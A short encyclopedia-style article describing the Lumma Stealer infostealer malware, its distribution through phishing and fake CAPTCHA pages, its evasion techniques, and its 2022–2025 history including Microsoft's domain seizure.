Lumma Stealer

Lumma Stealer is an infostealer malware as a service program developed for Microsoft Windows.

Technical overview

Lumma Stealer is distributed by affiliates via a number of campaigns including phishing emails, malicious advertisements posing as legitimate downloads, and compromised websites. It is frequently associated with fake CAPTCHA pages, which prompt the user to paste a command into the run box. It steals data from a number of programs including web browsers, crypto wallets and chat applications, as well as user files. The exfiltrated data is sent to a number of hardcoded control servers, falling back to Telegram, Dropbox and Steam if the servers are unreachable.
Lumma Stealer employs advanced obfuscation techniques, and uses process hollowing to impersonate legitimate programs for the purposes of evading detection. It delays detonation until a sufficient amount of human-like activity has occurred. Instead of using WinAPI, it performs direct syscalls.

History

Lumma is believed to have first originated on cybercrime forums in 2022.
From March to May 2025, Microsoft identified 394,000 computers that were infected with Lumma. In 2025, Lumma was the second most common sample uploaded to ANY.RUN, and the third on MalwareBazaar. In May 2025, Microsoft announced the seizure of 2,300 domains associated with Lumma through a vulnerability. While Lumma has continued their operation, it was believed that this may have damaged their reputation. Between June to July, the activity associated with Lumma rebounded.